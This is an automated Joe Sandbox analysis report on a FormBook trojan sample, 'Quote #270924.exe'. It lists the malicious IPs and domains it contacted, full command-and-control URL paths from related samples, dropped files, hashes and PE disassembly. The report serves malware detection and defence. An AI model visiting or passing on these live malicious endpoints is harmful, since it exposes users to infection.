                                                                                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://i2.cdn-image.com/__media__/js/min.js?v2.3Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.martaschrimpf.info/Schrimpf.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4S6840KTgRobocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            		unknown

                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                            Public IPs

                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                            162.0.238.43
                                                                                                                                                                            		www.tomtox.topCanada
                                                                                                                                                                            		22612NAMECHEAP-NETUStrue
                                                                                                                                                                            65.21.196.90
                                                                                                                                                                            		030003302.xyzUnited States
                                                                                                                                                                            		199592CP-ASDEtrue
                                                                                                                                                                            172.67.165.25
                                                                                                                                                                            		www.b5x7vk.agencyUnited States
                                                                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                                                                            160.251.148.20
                                                                                                                                                                            		www.nojamaica.netJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                                                            208.91.197.39
                                                                                                                                                                            		www.alphaaistore.comVirgin Islands (BRITISH)
                                                                                                                                                                            		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                            208.91.197.27
                                                                                                                                                                            		www.martaschrimpf.infoVirgin Islands (BRITISH)
                                                                                                                                                                            		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                                            38.47.233.19
                                                                                                                                                                            		2q63f.topUnited States
                                                                                                                                                                            		174COGENT-174UStrue
                                                                                                                                                                            3.33.130.190
                                                                                                                                                                            		tracy.clubUnited States
                                                                                                                                                                            		8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                            85.159.66.93
                                                                                                                                                                            		natroredirect.natrocdn.comTurkey
                                                                                                                                                                            		34619CIZGITRtrue

                                                                                                                                                                            General Information

                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                            Analysis ID:1520627
                                                                                                                                                                            Start date and time:2024-09-27 17:28:14 +02:00
                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                            Overall analysis duration:0h 8m 56s
                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                            Report type:full
                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                            Run name:Run with higher sleep bypass
                                                                                                                                                                            Number of analysed new started processes analysed:7
                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                            Number of injected processes analysed:2
                                                                                                                                                                            Technologies:
                                                                                                                                                                            • HCA enabled
                                                                                                                                                                            • EGA enabled
                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                            Sample name:Quote #270924.exe
                                                                                                                                                                            Detection:MAL
                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@12/9
                                                                                                                                                                            EGA Information:
                                                                                                                                                                            • Successful, ratio: 80%
                                                                                                                                                                            HCA Information:
                                                                                                                                                                            • Successful, ratio: 87%
                                                                                                                                                                            • Number of executed functions: 38
                                                                                                                                                                            • Number of non-executed functions: 326
                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                            Warnings

                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                                                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • VT rate limit hit for: Quote #270924.exe

                                                                                                                                                                            Simulations

                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                            11:30:07API Interceptor7563192x Sleep call for process: Robocopy.exe modified

                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                            IPs

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            162.0.238.43Product Data Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.mandemj.top/to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ
                                                                                                                                                                            PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.storestone.xyz/pd4o/
                                                                                                                                                                            QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.mandemj.top/to69/?vlJ0J=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB6xmvPC7jVOY3WNYEUB78n7uOkwblrlFm/iycyJOk57iLJ//IZc=&HDJP=Pnl8G6jPyrn
                                                                                                                                                                            BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.mechecker.life/b6h1/
                                                                                                                                                                            2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.mandemj.top/to69/?mnShvP=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=&Cbj=nB9LWdWpMT7tUBt
                                                                                                                                                                            SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.mandemj.top/to69/?VzA=dz5HvTSP4ZdlFHDP&RD4=jnxbIh9toY3Lk087BKTBUwMLIQNntOIIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXTMZnvKu4jSfDtGBlDX578zWDJUwflrx6suU=
                                                                                                                                                                            x.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.withad.xyz/r0nv/
                                                                                                                                                                            bin.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.withad.xyz/r0nv/
                                                                                                                                                                            rfOfF6s6gI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.heolty.xyz/sr8n/
                                                                                                                                                                            4qV0xW2NSj.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.heolty.xyz/sr8n/
                                                                                                                                                                            65.21.196.90LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.030002304.xyz/7b6l/
                                                                                                                                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.030003302.xyz/vkua/
                                                                                                                                                                            PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.070001350.xyz/ivyl/
                                                                                                                                                                            FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.030003112.xyz/dk22/
                                                                                                                                                                            Purchase order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.070001350.xyz/zvc6/
                                                                                                                                                                            DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.030002304.xyz/tmpg/
                                                                                                                                                                            Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.070001350.xyz/zvc6/
                                                                                                                                                                            doc330391202408011.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.030002060.xyz/oap7/
                                                                                                                                                                            DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.030002721.xyz/i28e/
                                                                                                                                                                            yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.030002060.xyz/d629/?EN-hu=KAaEqqZfS4cDvU3Ij6Gom2nrmNT9tw2tnUHZxD+rCxnnN6LgNdSAGbreu7nZG1S4n6xTi0fmbnaWzdqJKm8Z7U+GaCKh7LK1IRPJE/WiiU/xJvV0/w==&zx=TzUh

                                                                                                                                                                            Domains

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            natroredirect.natrocdn.comRN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 85.159.66.93
                                                                                                                                                                            www.alphaaistore.comPO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 208.91.197.39
                                                                                                                                                                            www.b5x7vk.agencyPO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 172.67.165.25
                                                                                                                                                                            rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 104.21.11.31
                                                                                                                                                                            Payment Advise-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 172.67.165.25
                                                                                                                                                                            DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 104.21.11.31

                                                                                                                                                                            ASNs

                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                            CLOUDFLARENETUShttps://effective-teammates-567500.framer.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 172.65.208.22
                                                                                                                                                                            ATT71817.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                            FoS5cjKhd3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                            • 104.21.4.136
                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                                            • 172.67.162.108
                                                                                                                                                                            https://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fcasaderestauraciononline.com%2Fholy%2Findexsyn1.html%23cmltYS5hbWV1ckBjYXRhbGluYW1hcmtldGluZy5mcg==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                            0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                            https://changeofscene.ladesk.com/605425-Secure-Business-DocumenGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.17.24.14
                                                                                                                                                                            https://careeligibility.vercel.app/chubedanGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 172.67.75.166
                                                                                                                                                                            https://clicktracking.yellowbook.com/trackingenginewebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://femalewhowork.sa.com/rUswT/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.17.25.14
                                                                                                                                                                            https://lkk6m.conownsup.com/tpgbE/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 104.17.25.14
                                                                                                                                                                            CP-ASDEfile.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                                                                                            • 65.21.18.51
                                                                                                                                                                            https://bn54.donegabang.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • 65.21.235.194
                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                                                                                                                            • 65.21.18.51
                                                                                                                                                                            eovQPjY5wz.exeGet hashmaliciousLummaC, RedLineBrowse
                                                                                                                                                                            • 65.21.18.51
                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                            • 65.21.18.51
                                                                                                                                                                            Audio playback00_05-30-00000.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 65.21.45.74
                                                                                                                                                                            file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                                                                                                                                                                            • 65.21.18.51
                                                                                                                                                                            http://ipscanadvsf.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 65.21.119.50
                                                                                                                                                                            jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                                            • 65.21.18.51
                                                                                                                                                                            file.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                            • 65.21.18.51
                                                                                                                                                                            NAMECHEAP-NETUShttp://www.hongkong-post.frairza.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.219.248.95
                                                                                                                                                                            shipping notification_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 162.0.238.238
                                                                                                                                                                            https://inveceinvece-fab1fa.ingress-bonde.ewp.live/wp-content/plugins/nwesidem/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 63.250.43.2
                                                                                                                                                                            https://broccolitaptrain-facc4a.ingress-florina.ewp.live/wp-content/plugins/Suspendisse%20vitae/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 63.250.43.137
                                                                                                                                                                            https://sites.google.com/view/loigfedrty/accueilGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 63.250.43.14
                                                                                                                                                                            https://fhjurjb-fae123.ingress-bonde.ewp.live/wp-content/plugins/kolydss/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 63.250.43.1
                                                                                                                                                                            https://hongkong-post.frairza.com/tracking/?pwd=dhlGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.219.248.95
                                                                                                                                                                            https://hongkong-post.frairza.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                            • 104.219.248.95
                                                                                                                                                                            https://inoltreinoltre-fab1fa.ingress-earth.ewp.live/wp-content/plugins/aiimaea/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 63.250.43.129
                                                                                                                                                                            https://dunquedunque-fab1fa.ingress-earth.ewp.live/wp-content/plugins/aiimaea/pages/region.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 63.250.43.129
                                                                                                                                                                            INTERQGMOInternetIncJPCapital Call - GCJ VI_Sept 23 2024.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 150.95.219.86
                                                                                                                                                                            UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                            • 133.130.35.90
                                                                                                                                                                            PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 133.130.35.90
                                                                                                                                                                            https://flowcode.com/p/epjMkCwdtPGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 118.27.125.197
                                                                                                                                                                            Audio playback00_05-30-00000.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                            • 150.95.219.86
                                                                                                                                                                            https://flowto.it/epjMkCwdtPGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 118.27.125.197
                                                                                                                                                                            https://flowcode.com/p/epjMkCwdtPGet hashmaliciousUnknownBrowse
                                                                                                                                                                            • 118.27.125.197
                                                                                                                                                                            ORDER_1105-19-24-3537.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 150.95.255.38
                                                                                                                                                                            Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • 133.130.35.90
                                                                                                                                                                            https://hachidori87.com/wp-content/Magenta/MagentaGet hashmaliciousPhisherBrowse
                                                                                                                                                                            • 163.44.185.223

                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                            No context

                                                                                                                                                                            Dropped Files

                                                                                                                                                                            No context

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\40mEe3Hg

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\SysWOW64\Robocopy.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                            Entropy (8bit):1.121297215059106
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\recomplete

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Users\user\Desktop\Quote #270924.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):289792
                                                                                                                                                                            Entropy (8bit):7.9937449075373985
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:6144:3pHGWmBNol9389aqor+LGgNlrN9P9hl48PILlFS89eZvSyZj2z9uoASU6:3pmWYol9389Vor+imNNp97nPILlcZvS9
                                                                                                                                                                            MD5:8BF7C1AD41C40B026B7FFA0802D3F219
                                                                                                                                                                            SHA1:AEBA85B2D078740B02CCAFD7C28F159B063103B2
                                                                                                                                                                            SHA-256:E1E0F97490057B5DD025A2883C87613CB11AA154971FCF0406BFC4ED828BEAD7
                                                                                                                                                                            SHA-512:CF641D7ECAB37E03DDA6D126A67FBA8C7DAAC39771E360B128A56025F7D1EB511E1E92C1FBE1D4CA879C9BA18A5DB25978F02B55539176059A7C830F3C031167
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview:.k.g.4H72...N...i.Y7...dW?...X1U5Y4H72LT7GTQX1U5Y4H72LT7GTQ.1U5W+.92.].f.P..ta1];.B>;P55<xR4[7[<.P)tE2:q1_uq.ghZ](1.JY[|1U5Y4H7KM].z46..5R..(P.V.n1?.O...tWU.N..m8V.g0W .R+.7GTQX1U5.qH7~MU75...1U5Y4H72.T5F_PS1Uo]4H72LT7GT.L1U5I4H7BHT7G.QX!U5Y6H74LT7GTQX7U5Y4H72L$3GTSX1U5Y4J7r.T7WTQH1U5Y$H7"LT7GTQH1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7i 4 EU5Y..32LD7GT.\1U%Y4H72LT7GTQX1U.Y4(72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72LT7GTQX1U5Y4H72L

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Entropy (8bit):7.542938203344601
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                            File name:Quote #270924.exe
                                                                                                                                                                            File size:1'366'661 bytes
                                                                                                                                                                            MD5:1018070ffeb3f5fa59a306fa6e6b0f57
                                                                                                                                                                            SHA1:df752f8bc6b8b9be639a4135c06f401a6701fc35
                                                                                                                                                                            SHA256:5da3520f7feeae6c6ec79f99c5cc9b5ff73bfd57b29ca80b3aa2fd1a718df59e
                                                                                                                                                                            SHA512:96f6e5c2a32366069193296007206e925482468d65dc2993757347d5c05cd95b5bc296239a92ca9bc2bc0161e8141f178f2f38856c9a84653b91118047722413
                                                                                                                                                                            SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCUg4YE5n/Dbbdh9QVl9/UKIGbjw5:7JZoQrbTFZY1iaCoYmf5hWricw5
                                                                                                                                                                            TLSH:F855F121F5C69036C2B326B09E7EF36A963D79360336D19727C82E315EA05416B3A773
                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:1733312925935517

                                                                                                                                                                            Static PE Info

                                                                                                                                                                            General

                                                                                                                                                                            Entrypoint:0x4165c1
                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:5
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                            Instruction
                                                                                                                                                                            call 00007EFED8C77DCBh
                                                                                                                                                                            jmp 00007EFED8C6EC3Eh
                                                                                                                                                                            int3
                                                                                                                                                                            int3
                                                                                                                                                                            int3
                                                                                                                                                                            int3
                                                                                                                                                                            int3
                                                                                                                                                                            push ebp
                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                            push edi
                                                                                                                                                                            push esi
                                                                                                                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                            mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                            mov edi, dword ptr [ebp+08h]
                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                            mov edx, ecx
                                                                                                                                                                            add eax, esi
                                                                                                                                                                            cmp edi, esi
                                                                                                                                                                            jbe 00007EFED8C6EDBAh
                                                                                                                                                                            cmp edi, eax
                                                                                                                                                                            jc 00007EFED8C6EF56h
                                                                                                                                                                            cmp ecx, 00000080h
                                                                                                                                                                            jc 00007EFED8C6EDCEh
                                                                                                                                                                            cmp dword ptr [004A9724h], 00000000h
                                                                                                                                                                            je 00007EFED8C6EDC5h
                                                                                                                                                                            push edi
                                                                                                                                                                            push esi
